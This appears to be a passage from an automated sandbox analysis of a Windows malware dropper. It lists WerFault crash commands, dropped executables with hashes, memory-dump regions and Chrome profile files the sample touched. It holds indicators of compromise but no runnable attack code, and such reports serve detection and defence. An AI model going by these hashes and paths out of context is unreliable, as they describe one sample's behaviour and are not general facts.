C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 516 -ip 516

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 516 -s 832

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 516 -ip 516

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 516 -s 1104

Network

Files

C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\setup_install.exe


C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\libcurlpp.dll

C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

memory/3164-64-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3164-70-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/1632-71-0x0000000073D5E000-0x0000000073D5F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14514904a4b.exe

MD5 bdbbf4f034c9f43e4ab00002eb78b990
SHA1 99c655c40434d634691ea1d189b5883f34890179
SHA256 2da3696e82b2a874191a6f4e3bfd26d4b7e5aa5d187c5afdebbe52263dccd5ae
SHA512 dc3e513ad8cbb887652660603ce76437c6d3670637a99c1145c08fa23de658a5c5ca395cc8a2532de7b73302e88e0e8f1c026c4bb1b23481a3a5bb2dc92a68ec

C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14d32a38896785b13.exe

MD5 148c3657379750b2fe7237ac1b06f507
SHA1 c464da9412a32ab71cd62491405296672c7ba3ad
SHA256 41a780cbf232d3ed4912406bdbb084f61c9faf56dcc0a7a81381546689170c64
SHA512 360588010bda2d3d514508fe9f2f95f63ca7a78476e24043985c350814c54f25c1f60c45e68e4431c2301f90b4092f88866624b12eb637145403592e7218d6bc

memory/4772-75-0x0000000002580000-0x00000000025B6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat1487ca754e680f91.exe

MD5 b4c503088928eef0e973a269f66a0dd2
SHA1 eb7f418b03aa9f21275de0393fcbf0d03b9719d5
SHA256 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2
SHA512 c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465

C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat1427fbafcf251.exe

MD5 8e0abf31bbb7005be2893af10fcceaa9
SHA1 a48259c2346d7aed8cf14566d066695a8c2db55c
SHA256 2df6cc430475ae053ad2772a3a9d1de1a03af31c3ebfdd0e5d5bd7fbdc61866a
SHA512 ba76470f4896e6bdac508e6a901b352a3bf731ab5680b9931cc1a8c874482cf0c19a374a6a58dda5237178c1861509529a5174bf76fa768efac7989dbc1c1970

memory/1632-87-0x0000000073D50000-0x0000000074500000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14a7594cc5a0116.exe

MD5 492fe12bd7a2ea0ba1d2a5672f5a013a
SHA1 934a18ff3f83a43ce8c4a3cacba0d30d82c4276c
SHA256 45e13af971ea12864fd315f67096d0547bee1e07994f16bfedba10ca5beaad0f
SHA512 de5c99a7e20949bcd75bde8d971b343a6bae5255b5d46dd9472fde13ab0c3b4ce317eaf44527f79a113e2bd0b0efb0d19a5a53834e9b28a41b4885a888bcfd67

memory/1632-88-0x0000000073D50000-0x0000000074500000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe

MD5 77666d51bc3fc167013811198dc282f6
SHA1 18e03eb6b95fd2e5b51186886f661dcedc791759
SHA256 6a3d44d750ba258b1854431d89db135abc5d543ada1b384c5306e98031b8f1c9
SHA512 a024f008567a7417fe975063f661a0b278fb70c7576a7453e482f2e3f5c6cc48b5faaa55ec197e3082626faaa3598c9ff7bcca798ba7a1408bf666e61fdf4cd0

C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat142b09ae40c44cf.exe

MD5 a1d90c2ea649aae4d9492b584c52ef5c
SHA1 32969454090b6dd84a9b97d19bd58845cda5aae6
SHA256 64f7fc506342b8fd9bf09d45a012f9c996237e06cffbade5d3aedb1c8d967023
SHA512 09bf2aa523933dc05fb23a6d97f56ba33ba5894667b62f2275a4e94b86e9ac82d6faeda7dfdc0ac1c966fe13b0be29ae98158850d815021bd88837a3453b6e73

memory/4772-95-0x0000000073D50000-0x0000000074500000-memory.dmp

memory/1960-110-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat1481f5a7e3eccdd.exe

MD5 9b07fc470646ce890bcb860a5fb55f13
SHA1 ef01d45abaf5060a0b32319e0509968f6be3082f
SHA256 506c6ee68b29701403739da25679b640d21b1b121f45dde5bc25705901a6ed0b
SHA512 4cc1b725c6fb539d832d2d5315bbc63e967a41129d25c2102b2df19e4931e4e06c2a9f70a3336d98b9e031c636d021e713f10dbbd86a57f447a7581221a470cc

memory/2664-120-0x0000000000960000-0x0000000000966000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-KMO4M.tmp\Sat1481f5a7e3eccdd.tmp

MD5 9303156631ee2436db23827e27337be4
SHA1 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256 bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA512 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14febbc433.exe

MD5 4d255e96e5056f2c899884babcc55691
SHA1 44caeb1df6288c94081b805ee17f66db34dc7834
SHA256 e7678a0537796c6199bbc7fc5c143b475280564558250df218d62012c3b98506
SHA512 ad2cebd784a525d3fe2e3523c4f3d2ab793da84811a41b08aae99141d9c53f545b180d36f05647ddef04bba200b6a0fc917e481913f3b2b0162c136ec8355c44

C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat144474a564d26f29.exe

MD5 962b4643e91a2bf03ceeabcdc3d32fff
SHA1 994eac3e4f3da82f19c3373fdc9b0d6697a4375d
SHA256 d2671668c6b2c9da5d319e60dea54361a2cbb362e46628cf0dccb5ff0baf786b
SHA512 ef6f4a5ccfff09506c925003ac49837d771787028fddcf2183e98cba2794df375fd0d5099e36abf8fedfc0dddd10ad076d2fc69a77b8ffd8180215b5cfc88dfd

memory/4772-124-0x0000000005A40000-0x0000000005D94000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-MG158.tmp\idp.dll

MD5 b37377d34c8262a90ff95a9a92b65ed8
SHA1 faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256 e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
SHA512 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

memory/4840-138-0x0000000002670000-0x000000000268E000-memory.dmp

memory/4840-118-0x0000000004C30000-0x0000000004CA6000-memory.dmp

memory/4840-117-0x00000000004C0000-0x0000000000528000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tmrtdrbm.ofb.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2664-102-0x00000000001A0000-0x00000000001B8000-memory.dmp

memory/4840-148-0x0000000005550000-0x0000000005AF4000-memory.dmp

memory/3908-153-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1960-160-0x0000000000400000-0x0000000000414000-memory.dmp

memory/4772-161-0x0000000005EC0000-0x0000000005EDE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-FG7JN.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

memory/3164-181-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3164-180-0x0000000064940000-0x0000000064959000-memory.dmp

memory/3164-172-0x0000000000400000-0x000000000051C000-memory.dmp

memory/4524-182-0x0000000000400000-0x0000000000883000-memory.dmp

memory/3164-179-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3164-178-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/3164-177-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/4772-162-0x0000000005F60000-0x0000000005FAC000-memory.dmp

memory/1480-156-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/4772-101-0x00000000051D0000-0x0000000005236000-memory.dmp

memory/4772-100-0x00000000050B0000-0x0000000005116000-memory.dmp

memory/4772-98-0x0000000005010000-0x0000000005032000-memory.dmp

memory/4560-97-0x0000000000580000-0x0000000000588000-memory.dmp

memory/4772-193-0x0000000006480000-0x00000000064B2000-memory.dmp

memory/4772-211-0x0000000007150000-0x00000000071F3000-memory.dmp

memory/4772-217-0x0000000007200000-0x000000000721A000-memory.dmp

memory/4772-218-0x0000000007270000-0x000000000727A000-memory.dmp

memory/4772-216-0x0000000007880000-0x0000000007EFA000-memory.dmp

memory/1632-205-0x000000006D0E0000-0x000000006D12C000-memory.dmp

memory/4772-219-0x0000000007460000-0x00000000074F6000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Sat1427fbafcf251.exe.log

MD5 e5352797047ad2c91b83e933b24fbc4f
SHA1 9bf8ac99b6cbf7ce86ce69524c25e3df75b4d772
SHA256 b4643874d42d232c55bfbb75c36da41809d0c9ba4b2a203049aa82950345325c
SHA512 dd2fc1966c8b3c9511f14801d1ce8110d6bca276a58216b5eeb0a3cfbb0cc8137ea14efbf790e63736230141da456cbaaa4e5c66f2884d4cfe68f499476fd827

memory/4772-226-0x00000000073F0000-0x0000000007401000-memory.dmp

memory/4476-238-0x0000000005550000-0x000000000558C000-memory.dmp

memory/4476-231-0x0000000005620000-0x000000000572A000-memory.dmp

memory/4476-225-0x00000000054F0000-0x0000000005502000-memory.dmp

memory/4772-243-0x0000000007520000-0x000000000753A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2KSA.Gf7

MD5 579bb1646a87227e82a1605393b00e88
SHA1 dc162c4bb00af485e2e7ff2a852176dc7a23ed07
SHA256 65b9420390e82eb5a1e408463d96b68384b5b75817412e811f44cca10cc2cf32
SHA512 ee25fd476f7a4acae8132cb7a64dc6ff8196025522b2e9308c0f8badbaaba4ec4081c55f5667dfa11c074337f41e2a5168fe87a93bcfcbb28ffeecc4ba8616e9

memory/4772-263-0x0000000073D50000-0x0000000074500000-memory.dmp

memory/1632-262-0x0000000073D50000-0x0000000074500000-memory.dmp

memory/220-261-0x0000000002F90000-0x0000000003138000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 968cb9309758126772781b83adb8a28f
SHA1 8da30e71accf186b2ba11da1797cf67f8f78b47c
SHA256 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA512 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 710b824fe9f0e50bdfa636b72f34da2e
SHA1 0d772a82e4b5e9c756198cfe076c10b12c417543
SHA256 31b2e3b81e508483fac508a3c4afbeb48f19dabcc504326c2d76a64a5a221ec4
SHA512 041f7747ac57d00533ff343e1498475c1cec19884f55e84ca3ca8786a78c84171d8b039117fffddab870a8c88f00273dfa64964d3328891824a740327116fffb

C:\Users\Admin\AppData\Local\Temp\9h1gI_ny.t

MD5 719406c6176706f60d8f511ce6096c2d
SHA1 5044cc1af74e9d762feabdfe1fa46ad558249a65
SHA256 53642a2d499eb8bc9fdc9c27344436dc5989f9f493c4d21648172b7110e906a0
SHA512 9c00fda0639daaae2882f2932ab8e1b29403b9434473bb34f10d229b33f68d973f1a8b73968b7386ad9d4551cad6cb8ec86c1f45fa57637e0cfcae0c7b0b911e

C:\Users\Admin\AppData\Local\Temp\U9bIuq0J.~dW

MD5 dcb29594703e229efa20bedff41fe3e6
SHA1 7473bf4265ce63a48d46f76af3a709eeb89e5363
SHA256 f0f3e4ac0575c8cca414c05075dc4ec3f9fa987a63942d5ec222758eadca2331
SHA512 bd8e007cc26bf03d202c6cd6a5655d3aebef4ac61e39306fa139f52e1bb051a29c7d088fac3717c57ec23fea6be7260c1d1917a9c76f6bb2c207b2d10b68f982

C:\Users\Admin\AppData\Local\Temp\i5glXU.q

MD5 df345237695fb3974d0adb7ba892db7b
SHA1 4f6904679510f87b4e3df83e4c1f3804cb4aa773
SHA256 76a22ff20b5a218c06469f45c87209471b7f5f33fb680ed539efb090c1632bad
SHA512 bf43ae459535b92f739413aeee3cdb8f27ace4e0009024e0381b13632e1dbc23df667eab924959c43b805b1305dabe6caaf88785fb0ab1d45544d9d46ba7d50e

C:\Users\Admin\AppData\Local\Temp\vuR_hcMP.3T

MD5 c7d6c3ce016c46c94cfcda0c814f2889
SHA1 a552326f590bbf8d2f9a69a23863cefd83ff9687
SHA256 733e5e284c182b6de7e2d287a4b12722cfba8c393dd82bb11c766cbe5b94bb43
SHA512 6c6e7538a0f5c91be742caaab91cc3e87f8574a2a492831015f16d8e01e3fb9a9f11abc3155b4c573c7305e4057ce6013f2cbf4dd710b4a2773339790ea97a08

C:\Users\Admin\AppData\Local\Temp\lkyqBUE.m

MD5 ce2da93761dc1ddb916fd1474c2a4e8f
SHA1 5d04fad0fd8df47a2cf322288a9ef5bbe85a783c
SHA256 c5284035228617e55e3ddb94d5900a0a460d292ad121b8ad6f0c10497a700673
SHA512 77f4dfa33e102f0b3d94a167413f3ef30dcd522d4a3c000203521449e385bba4b5691f38408e75b378cc62d9fed98b460e6e1daa0251332aa9105d52d54a5b44

memory/4772-245-0x0000000007510000-0x0000000007518000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\PajLCM.4

MD5 ac6ad5d9b99757c3a878f2d275ace198
SHA1 439baa1b33514fb81632aaf44d16a9378c5664fc
SHA256 9b8db510ef42b8ed54a3712636fda55a4f8cfcd5493e20b74ab00cd4f3979f2d
SHA512 bfcdcb26b6f0c288838da7b0d338c2af63798a2ece9dcd6bc07b7cadf44477e3d5cfbba5b72446c61a1ecf74a0bccc62894ea87a40730cd1d4c2a3e15a7bb55b

memory/4772-241-0x0000000007430000-0x0000000007444000-memory.dmp

memory/4772-239-0x0000000007420000-0x000000000742E000-memory.dmp

memory/220-264-0x00000000034F0000-0x0000000003595000-memory.dmp

memory/4476-224-0x0000000005960000-0x0000000005F78000-memory.dmp

memory/4476-220-0x0000000000400000-0x000000000041E000-memory.dmp

memory/220-268-0x00000000035A0000-0x0000000003632000-memory.dmp

memory/220-265-0x00000000035A0000-0x0000000003632000-memory.dmp

memory/4772-204-0x0000000006460000-0x000000000647E000-memory.dmp

memory/4772-194-0x000000006D0E0000-0x000000006D12C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14f1396dfcf191bd.exe

MD5 15c6dc87edd001c0bf0df6f9405ad7db
SHA1 9582017cd83642ffdac143daeed13e840f4b2350
SHA256 5e7a5af6e0cea11934feaa716867e906644eb20df743b1c5fa85558de0c1b10d
SHA512 6fffd09475af31c9cdc56f561c13921975c236c6590ede369e5d863469452a6224d2ee9550d9f73fb65696c9d46185e487bf0764922c95831882a8029151603f

memory/4772-90-0x0000000073D50000-0x0000000074500000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat142ac5249376e895.exe

MD5 91e3bed725a8399d72b182e5e8132524
SHA1 0f69cbbd268bae2a7aa2376dfce67afc5280f844
SHA256 18af3c7bdeb815af9abe9dcc4f524b2fb2a33ac9cc6784f31e302c10a8d09a0d
SHA512 280fe25f4813bc261dee3b38ad03364896f3b4f049dcf1d94c6c6e7abb09b47e06445746719d902281d04cc15879d745dd0b71a466fa31f952ae51f90360ae76

memory/1632-81-0x0000000005240000-0x0000000005868000-memory.dmp

memory/4772-73-0x0000000073D50000-0x0000000074500000-memory.dmp

memory/3164-69-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/3164-66-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3164-68-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3164-67-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3164-65-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3164-63-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3164-62-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3164-61-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3164-60-0x0000000064940000-0x0000000064959000-memory.dmp

memory/3164-59-0x0000000064941000-0x000000006494F000-memory.dmp

memory/3164-58-0x0000000000EE0000-0x0000000000F6F000-memory.dmp

memory/3164-57-0x000000006B440000-0x000000006B4CF000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 4e52a7e6ab05faaaf0e0c605191c63e2
SHA1 c464190eb817eac2de38fa811d0d0772fe8f5d19
SHA256 c062762a6f174bfe3bf436cee08376113d2fef597ba32e583e1c54c2c5e5eac0
SHA512 86107d0c56b6130cb56e6814e6b18f7790ba0398b89ec13203515765a84f4acaa360205fa253439084affcfa7ea38dbfd073249c7c5dd9d12e921e7a582ec0e9

\??\pipe\crashpad_2360_GXMOJCNVTVIMNBIW

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/516-287-0x0000000000400000-0x000000000089C000-memory.dmp

memory/3696-296-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/3908-295-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\234920dd-f4ac-4ae8-adc8-bc85b91b8550.tmp

MD5 4c52c9c0cc2080425dddad44ed42fba1
SHA1 91664b7209874c32cb695ce9885a0a5fc52639e9
SHA256 da7a133164482ff9d7301e694dc1f74d96b6c324f380dcab6584507175792357
SHA512 c65221a3edbb7b14b889e46e972dbe85d54aced1f5d41d8f247ea1afd96f0ed59545d56fc230d0b16278f1bc8a2ebd39d37bbcfdc709409f8d727408019977ad

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 2c1f17b0b16a3617712e4ff53e630f5e
SHA1 f9e7fd3bf5a60f0f6286eba72607fa3b0f45f599
SHA256 00453611fb97d528feefc7eccea9ab54d2f40b17427f335c1fbb48cbf8f74e38
SHA512 6d88d1ca7a6d5644f4251166cd81ffb8383d8100ac19b1562bce5ac2ac2e621ed06dea396a209982f7a9d8f35a6071ef359edeba1e7d05e41f203b61a1e07df5

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 ed00e789cd1b5dedf4aff3eef8fe800e
SHA1 3689d9e47cb71a2d42f07ddeb571e154ca762396
SHA256 e47370fbe37d28b757bbf41ec032c2057174e748bd9de0cf12589e56cf0aeb19
SHA512 7473fb399f8e7d94132ae43389936eab8f6715ac83f336dc61283a5e2250ceef676f0bf14e53d12d6c02689da7cfa6e009f5e4897deb3b33aea60480ea06c318

memory/220-328-0x0000000002F90000-0x0000000003138000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 8daa03f577bbabb2a185a9caae993f42
SHA1 3012ec3e51f81b397abc9a1fa31132becd7cdeaf
SHA256 b393391bfe8f8c5f4d8b32c34937b750178b61931574877aaeed54901a005da2
SHA512 005562a7a58c82842acff01e6c00d495c13dc75fa9f53d215a9c51bd4ff4f4f8f6ea40fb41a424494cd2b62820808a4dec75ec73e864577e7bb178511571761c

memory/516-334-0x0000000000400000-0x000000000089C000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 1ae017ff88063f76b5a827124564d7fe
SHA1 30e43c73711d8888246e0f7af59fddd058414c6a
SHA256 8136d136b7c2e12cefd3146c5aecdef1140d75cabcdd2c8e41df603a1eed271e
SHA512 7efdf1dd8e41cdd72a05921ff78c37ccb4ffc381d83e2f9cf7b6bc6cd4c0e7e25ec48820acea0069765d8cfce59fdfc6f8be48c4c695cd471acbb04be7b0b45e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

MD5 e00568a8a719d8634d2125c9b45e3e80
SHA1 02a77a158a30663ea9f128c96e7292e31595dd29
SHA256 5f88c524b42f435e8497c2d2eb5c016788f843e9660aa58477f554dd9cb3dd64
SHA512 4b5aea1119933a3498f3387b00467ba86d35ad03eb58c9fc606a97000b1bb5ceb089383f70ecd7e1c5a313ae5c4b43995ff495a25e95cbf8d8af7f4206c6669f

memory/220-358-0x00000000035A0000-0x0000000003632000-memory.dmp

memory/220-359-0x0000000003640000-0x00000000053EF000-memory.dmp

memory/220-360-0x00000000053F0000-0x000000000547C000-memory.dmp

memory/220-361-0x0000000005480000-0x0000000005509000-memory.dmp

memory/220-362-0x0000000005480000-0x0000000005509000-memory.dmp

memory/220-364-0x0000000005480000-0x0000000005509000-memory.dmp

memory/220-365-0x0000000000CA0000-0x0000000000CA1000-memory.dmp

memory/220-366-0x0000000000CB0000-0x0000000000CB4000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 cb1948a8671e080126932a3463690ced
SHA1 e3baedc398d5de26da0afae09f52ba669d86a651
SHA256 94587d24c135ad5bbbbda7cb25d2c3b069fd32aeb428e29be5d3da3e71e6eb5d
SHA512 2bc5e6b9b5bdbf58c897ebd25db0621b1e2332eb05b643b785b4b21067e21a87d5c09bc2d382bbc2d53fa5fbc5b6aec38a9f404dba54626530acabec4d84368a

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 d459575d27857eb89ec29bcaa04f85b3
SHA1 846b4ad685ff64ca5292cac7cce341ecd7889906
SHA256 f96bd3a2d53c1d9e98176b16f56e61fe9d08f30a6777395870c935e2da6daa49
SHA512 d32be7602f05466db38bef451091d3440837c2cd68356a8f4785d105e64d9c4aaa6932e5b0216b1b503bdff3c5a6953731d68054307712458c713930fa1b6a4c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 69d573e4a1686d17a0d1319d34cb0872
SHA1 43045018375610b17484d6219ed688206a87e8b4
SHA256 9fc01a0d72d5141e597cad123455d84cdf591a41654b4832f7d86583c154d2c1
SHA512 a1a3095a15866069389123a64c88492df428335e857c2571a188813a4b575426ed233fb63b8b3342949aea7aa7d64c70855de6dfa561094bf3f75b053d2acef2

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 95b85e42b000516342eca0a638311a45
SHA1 cbcd3e382be2f0210f685db2a06a986cf43c6347
SHA256 b8ec805af4c22c7c7d5c9eb8ee9fd229bc3cfab1484db3da9105716247565da7
SHA512 b6d58206bf3c062d4dbcf2ba935410315353ca66ed138d74b95a7c831ccef891f8b5ca0d788610d1502df283f154f4b127ffd6f0fc28f17ecf77d4120537ec0e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 7968a1add4ef9d94de5622ada11a9f62
SHA1 935ed348eba004ccfb4811250d1bb81c5f3c99ce
SHA256 ce239d1ce1df4a69329e0720333b7e8ea6b76f045d6ab074430c5f96a8b66120
SHA512 c13a069f8790f1da14bb82a33a2d4e468f2030341d7fb7521e6417c5af8faa4ce11022682f5968232811b326515d38feac949084021994c73790b02b67b65719

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 3f5be399796e9fd12738f306c9d1a7f8
SHA1 0cae79b04d599b0ed73fbff4024c5aa1f916f9b9
SHA256 77d97f4269ce00d75c78754fc08e2008bd29d0b6f9c913f8e1134b9ade0c3110
SHA512 6d46b1a3754c4ffebf65781e2ca47318af4b8304c949eade9ff856c5a6dbedd19ab1f8753ad81fc57cf58f554514ffa3491e07e31e756c98fa4094e3e798242d

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 c325e170f6d796e57b7f9217c57cf9e1
SHA1 fc10ae53f2a8df3bf49cac4a1efd953a0ce245ad
SHA256 2e92031743265c5c377ce6fc7a7322f50519d91c4a0f0671013f94db98d51daa
SHA512 50fa374d084ee812d85e8d5ec23cd67c97b717b7aefdff88496cba8456640f2542a297bdb034b5c37b3ac70414784042d3378c33f1535a82b2564e7da3595a11